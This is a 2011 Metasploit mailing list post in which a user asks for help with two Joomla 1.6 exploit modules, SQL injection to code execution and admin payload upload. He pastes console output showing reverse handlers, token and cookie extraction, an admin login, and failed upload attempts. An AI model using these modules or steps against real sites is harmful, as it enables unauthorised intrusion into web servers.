Metasploit mailing list archives
joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE)
From: Jeffs <jeffs () speakeasy net>
Date: Fri, 03 Jun 2011 16:39:34 -0400
Hello All, Anybody get joomla_filter_order and/or joomla_16_admin_exec to work?I've launched it against a vulnerable 1.6 install of Joomla and get the following (even tried varying BMCT and BMCR as instructed):
msf exploit(joomla_filter_order) > exploit [*] Started reverse handler on 192.168.1.108:4444 [*] Initializing exploit code ... ################################################ # Joomla! 1.6.0 SQL Injection -> PHP execution # ################################################ # By James Bercegay # http://www.gulftech.org/ # ################################################ [*] Attempting to determine Joomla version [*] The target is running Joomla version : 1.6 [*] Host appears vulnerable! [*] Got database table prefix : jos_ [*] Calculating target response times [*] Benchmarking 1 normal requests [*] Normal request avg: 0 seconds [*] Benchmarking 1 delayed requests [*] Delayed request avg: 1 seconds [-] Either your benchmark threshold is too small, or host is not vulnerable [-] To increase the benchmark threshold adjust the value of the BMDF option [-] To increase the expression iterator adjust the value of the BMCT option [*] Exploit completed, but no session was created. msf exploit(joomla_filter_order) > msf exploit(joomla_16_admin_exec) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.108:4444 [*] Attempting to extract a valid request token [*] Got token: 5546d400d2ac74f8bcc6f23ea1eec261[*] Got Cookie: 114a3fcff61e5bebf5463b377d1563a3 => e146646fc1c90611ba2117118785823c
[*] Attempting to login as: admin [*] Successfully logged in as: admin [*] Attempting to extract refreshed request token [*] Got token: 44e14542b6a247c4281e7004dff16397 [*] Attempting to upload payload wrapper component [*] Exploit completed, but no session was created. msf exploit(joomla_16_admin_exec) > _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) YGN Ethical Hacker Group (May 28)
- Re: joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) Jeffs (May 29)
- Re: joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) HD Moore (May 29)
- Re: joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) GulfTech Security Research (May 31)
- Re: joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) YGN Ethical Hacker Group (Jun 02)
- joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) Jeffs (Jun 03)
- Re: joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) GulfTech Security Research (Jun 03)
- Re: joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) Jeffs (May 29)